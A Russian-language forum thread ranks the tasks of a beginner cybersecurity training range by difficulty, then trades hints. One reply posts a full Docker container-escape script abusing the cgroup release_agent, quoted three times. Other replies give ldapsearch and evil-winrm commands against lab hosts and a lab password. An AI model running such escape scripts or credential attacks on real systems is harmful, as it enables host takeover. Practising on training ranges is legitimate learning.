Статья Тир лист Bootcamp: Обучение Кибербезопасности для Начинающих

Задания:

Ссылка скрыта от гостей

Онлайн-полигон для начинающих ("Bootcamp") предоставляет возможность пользователям улучшить свои навыки.
Оценка заданий: Все задания будут оценены по стандартной системе "tier list", которая включает категории от S (самые сложные) до F (самые лёгкие): S, A, B, C, D, E, F. Учтите, что это субъективное мнение, и уровень сложности может зависеть от вашего опыта и знаний.

Ссылка на pdf версию

https://codeby.net/attachments/articles_-tir-list-bootcamp-pdf.78497/?hash=51e2fd97e493547807819e494627b1d4

(стрелки, обозначают лишь последовательность web-1-1 -> web-1-2 и т.п web-4 -> web-5 )


---

Отдельно изображение можно посмотреть тут (скачать приблизить и рассмотреть)
imgur.com/a/map-bootcamp-loETgl9



Начнём по порядку с категории Web:

---

Категория Infra/инфраструктура:

Задания которые выделю отдельно:
С точки зрения тех что я бы решал, и не решал если ограничен по времени:
Web-2-2 Интересное задание с отправлением логов "Poisoning logs"
Web-8 Если хотите что то с Десериализацией
Web-9 Pivoting
Infra-2 Наконец что я чётко понял зачем и где можно применять DNS
infra-5/6 ради опыта решения фишинга phishing
infra-12 kerberos не так часто встречается в заданиях
"2Сбой в работе вычислительной системы" , задания из категории прочитай документацию и тыкай все функции в командую строку = tarantool from vk

 

[dsaiwlq1]

Бро можешь скинуть writeup всех?

 

[Archivist]

Бро можешь скинуть writeup всех?

Бро но зачем?

 

[dsaiwlq1]

Бро но зачем?

ну хотя бы подсказки на web9, infra4

 

[dsaiwlq1]

Бро но зачем?

web9 не смог сделать docker escape infra4 не понял как дампить информаций

 

[Archivist]

ну хотя бы подсказки на web9, infra4

web9
cve заходим на тачку
находим env |
прокидываем трафик к базе данных(если не ошибаюсь)
выбираемся из докера

как выбрать из докера (я где то находил статьи и оттуда взял вот это)

# Finds + enables a cgroup release_agent
d=`dirname $(ls -x /s*/fs/c*/*/r* |head -n1)`
# Enables notify_on_release in the cgroup
mkdir -p $d/w; echo 1 > $d/w/notify_on_release
# Finds path of OverlayFS mount for container
# Unless the configuration explicitly exposes the mount point of the host filesystem
# see https://ajxchapman.github.io/containers/2020/11/19/privileged-container-escape.html
t=`sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab`
# Sets release_agent to /path/payload
touch /o; echo $t/c > $d/release_agent
# Creates a payload
echo "#!/bin/sh" > /c
echo "/home/rceflag > $t/o" >> /c
chmod +x /c
# Triggers the cgroup via empty cgroup.procs
sh -c "echo 0 > $d/w/cgroup.procs"; sleep 1
# Reads the output
cat /o

и вот это ссылку у меня зачемт о написана

GitHub - k4sth4/Docker-Escape: Docker Container Escape

Docker Container Escape . Contribute to k4sth4/Docker-Escape development by creating an account on GitHub.

github.com

infra-4

123

ldapsearch -x -H ldap://10.154.16.134 -D "CN=Ralf Andrews,CN=Users,DC=edu,DC=stf" -W -b "DC=edu,DC=stf" "

 

[dsaiwlq1]

web9
cve заходим на тачку
находим env |
прокидываем трафик к базе данных(если не ошибаюсь)
выбираемся из докера

как выбрать из докера (я где то находил статьи и оттуда взял вот это)

# Finds + enables a cgroup release_agent
d=`dirname $(ls -x /s*/fs/c*/*/r* |head -n1)`
# Enables notify_on_release in the cgroup
mkdir -p $d/w; echo 1 > $d/w/notify_on_release
# Finds path of OverlayFS mount for container
# Unless the configuration explicitly exposes the mount point of the host filesystem
# see https://ajxchapman.github.io/containers/2020/11/19/privileged-container-escape.html
t=`sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab`
# Sets release_agent to /path/payload
touch /o; echo $t/c > $d/release_agent
# Creates a payload
echo "#!/bin/sh" > /c
echo "/home/rceflag > $t/o" >> /c
chmod +x /c
# Triggers the cgroup via empty cgroup.procs
sh -c "echo 0 > $d/w/cgroup.procs"; sleep 1
# Reads the output
cat /o

и вот это ссылку у меня зачемт о написана

GitHub - k4sth4/Docker-Escape: Docker Container Escape

Docker Container Escape . Contribute to k4sth4/Docker-Escape development by creating an account on GitHub.

github.com

infra-4

123

ldapsearch -x -H ldap://10.154.16.134 -D "CN=Ralf Andrews,CN=Users,DC=edu,DC=stf" -W -b "DC=edu,DC=stf" "

спасибо брааат спасибо большое лучший а то уже 2 дня не могу понять

 

[dsaiwlq1]

web9
cve заходим на тачку
находим env |
прокидываем трафик к базе данных(если не ошибаюсь)
выбираемся из докера

как выбрать из докера (я где то находил статьи и оттуда взял вот это)

# Finds + enables a cgroup release_agent
d=`dirname $(ls -x /s*/fs/c*/*/r* |head -n1)`
# Enables notify_on_release in the cgroup
mkdir -p $d/w; echo 1 > $d/w/notify_on_release
# Finds path of OverlayFS mount for container
# Unless the configuration explicitly exposes the mount point of the host filesystem
# see https://ajxchapman.github.io/containers/2020/11/19/privileged-container-escape.html
t=`sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab`
# Sets release_agent to /path/payload
touch /o; echo $t/c > $d/release_agent
# Creates a payload
echo "#!/bin/sh" > /c
echo "/home/rceflag > $t/o" >> /c
chmod +x /c
# Triggers the cgroup via empty cgroup.procs
sh -c "echo 0 > $d/w/cgroup.procs"; sleep 1
# Reads the output
cat /o

и вот это ссылку у меня зачемт о написана

GitHub - k4sth4/Docker-Escape: Docker Container Escape

Docker Container Escape . Contribute to k4sth4/Docker-Escape development by creating an account on GitHub.

github.com

infra-4

123

ldapsearch -x -H ldap://10.154.16.134 -D "CN=Ralf Andrews,CN=Users,DC=edu,DC=stf" -W -b "DC=edu,DC=stf" "

где можно достать ldap пароль?

 

[Archivist]

где можно достать ldap пароль?

из infra-2 теже креды теже имена

 

[dsaiwlq1]

из infra-2 теже креды теже имена

r_andrews@edu.stf -> ricardo не подходит

 

[Archivist]

r_andrews@edu.stf -> ricardo не подходит

логично не подходит, ведь у него другой пароль dancer если ты не записывал

 

[dsaiwlq1]

логично не подходит, ведь у него другой пароль dancer если ты не записывал

блин сорри я потом еще брутил все нашел спасибо тебе большое, а можно еще спросить у тебя если не получается ты лучший

 

[Archivist]

блин сорри я потом еще брутил все нашел спасибо тебе большое, а можно еще спросить у тебя если не получается ты лучший

ок спрашивай

 

[dsaiwlq1]

Брат у меня есть пароль у lshepherd.edu.stf 10.154.17.228 и там smb, rpc порты открыты и через smb зашел не мог найти flag.txt

 

[Archivist]

Брат у меня есть пароль у lshepherd.edu.stf 10.154.17.228 и там smb, rpc порты открыты и через smb зашел не мог найти flag.txt

если про infra10 то должен быть в коревой директории либо в домашней директории пользователя , хз не запоминаю где они разбросаны

 

[dsaiwlq1]

если про infra10 то должен быть в коревой директории либо в домашней директории пользователя , хз не запоминаю где они разбросаны

через smb надо входить точно?

 

[Archivist]

через smb надо входить точно?

нет
через
evil-winrm -u USERNAME -p PASSWORD -i HOST

 

[dsaiwlq1]

бро а как взломать keepass? я нашел database.kdbx

 

[Archivist]

бро а как взломать keepass? я нашел database.kdbx

тут гугл в помощь, просто загугли

 

[dsaiwlq1]

тут гугл в помощь, просто загугли

Все брат я его сделал А теперь остались 300 баллов 5) 2) 3) Мне надо помощ в 3)
Задание для атакующих
Получите доступ к компьютеру финансового директора компании (mholden.edu.stf, 10.154.16.208). Флаг содержится в файле financial.docx.
Я просканировал хост на порты

PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
1720/tcp open h323q931
3389/tcp open ms-wbt-server
6543/tcp open mythtv

Не могу подключиться Можно подсказку откуда достать их креды?